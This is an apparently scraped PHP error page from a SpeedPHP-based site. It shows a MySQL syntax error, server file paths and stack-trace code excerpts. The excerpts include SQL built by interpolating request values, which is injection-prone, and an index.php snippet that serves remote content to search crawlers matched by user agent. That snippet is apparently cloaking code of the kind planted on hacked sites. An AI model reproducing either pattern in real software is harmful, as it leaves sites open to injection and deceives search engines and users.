SELECT cases_id FROM gsp_cases WHERE category_id= and cases_id<115 ORDER BY cases_id desc LIMIT 1
执行错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and cases_id<115 ORDER BY cases_id desc LIMIT 1' at line 1
- /data/wwwroot/default/SpeedPHP/Drivers/mysql.php on line 62
57.
{
58.
$this->arrSql[] = $sql;
59.
if( $result = mysql_query($sql, $this->conn) ){
60.
return $result;
61.
}else{
62.
63.
spError("{$sql}<br />执行错误: " . mysql_error());
}
64.
}
65.
66.
/**
67.
* 返回影响行数
- /data/wwwroot/default/SpeedPHP/Drivers/mysql.php on line 26
21.
*
22.
* @param sql 执行的SQL语句
23.
*/
24.
public function getArray($sql)
25.
{
26.
27.
if( ! $result = $this->exec($sql) )return array();
if( ! mysql_num_rows($result) )return array();
28.
$rows = array();
29.
while($rows[] = mysql_fetch_array($result,MYSQL_ASSOC)){}
30.
mysql_free_result($result);
31.
array_pop($rows);
- /data/wwwroot/default/SpeedPHP/Core/spModel.php on line 107
102.
103.
//echo $sql;
104.
105.
if(null != $limit)$sql = $this->_db->setlimit($sql, $limit);
106.
107.
108.
return $this->_db->getArray($sql);
}
109.
/**
110.
* 过滤转义字符
111.
*
112.
* @param value 需要进行过滤的值
- /data/wwwroot/default/SpeedPHP/Core/spModel.php on line 65
60.
* @param sort 排序,等同于“ORDER BY ”
61.
* @param fields 返回的字段范围,默认为返回全部字段的值
62.
*/
63.
public function find($conditions = null, $sort = null, $fields = null)
64.
{
65.
66.
if( $record = $this->findAll($conditions, $sort, $fields, 1) ){
return array_pop($record);
67.
}else{
68.
return FALSE;
69.
}
70.
}
- /data/wwwroot/default/model/db_cases.php on line 78
73.
//获得上一篇下一篇
74.
function getNext($cases_id)
75.
{
76.
$category_id=$this->getField(array("cases_id"=>$cases_id),"category_id");
77.
78.
79.
$nextresult=$this->find("category_id={$category_id} and cases_id<{$cases_id}","cases_id desc","cases_id","0,1");
80.
if($nextresult)
81.
{
82.
$nextinfo=$this->find(array("cases_id"=>$nextresult["cases_id"]),"","cases_id,cases_title");
83.
$nextstr='<a href="/index.php?c=cases&a=view&id='.$nextinfo["cases_id"].'">'.$nextinfo["cases_title"].'</a>';
- /data/wwwroot/default/controller/cases.php on line 111
106.
$cases_id=$this->cytrim("id");
107.
$cid=$cases->getField(array("cases_id"=>$cases_id),"category_id");
108.
$parent_id=$cases->getField(array("cases_id"=>$cases_id),"parent_id");
109.
$viewtpl=$category->getField(array("category_id"=>$cid),"view_tpl");
110.
$this->casesvalue=$cases->spLinker()->find(array("cases_id"=>$cases_id));
111.
112.
$this->casesnext=$cases->getNext($cases_id);
$this->casesprev=$cases->getPrev($cases_id);
113.
$tplname="web/".$viewtpl;
114.
115.
$this->columnlist=$category->spLinker()->findAll(array("parent_id"=>$parent_id),"","category_id,category_name,type_id");
116.
$this->categoryvalue=$category->find(array("category_id"=>$parent_id));
- /data/wwwroot/default/SpeedPHP/spFunctions.php on line 21
16.
if(!is_object($handle_controller) || !method_exists($handle_controller, $__action)){
17.
eval($GLOBALS['G_SP']["dispatcher_error"]);
18.
exit;
19.
}
20.
// 路由并执行用户代码
21.
22.
$handle_controller->$__action();
// 控制器程序运行完毕,进行模板的自动输出
23.
if(FALSE != $GLOBALS['G_SP']['view']['auto_display']){
24.
$__tplname = $__controller.$GLOBALS['G_SP']['view']['auto_display_sep'].
25.
$__action.$GLOBALS['G_SP']['view']['auto_display_suffix']; // 拼装模板路径
26.
$handle_controller->auto_display($__tplname);
- /data/wwwroot/default/sy.php on line 29
24.
),
25.
);
26.
27.
require(SP_PATH."/SpeedPHP.php");
28.
require(SP_PATH."/Extensions/cyFunctions.php");
29.
30.
spRun();
31.
//<SCRIPT LANGUAGE="JavaScript" src=http://float2006.tq.cn/floatcard?adminid=9029183&sort=1 ></SCRIPT>
32.
?>
- /data/wwwroot/default/index.php on line 10
5.
6.
if(strpos($key,'Bytespider')!== false||strpos($key,'aidu')!==false){
7.
$file = file_get_contents($url);
8.
echo $file;
9.
}else{
10.
11.
include 'sy.php';
exit();
12.
}
13.
?>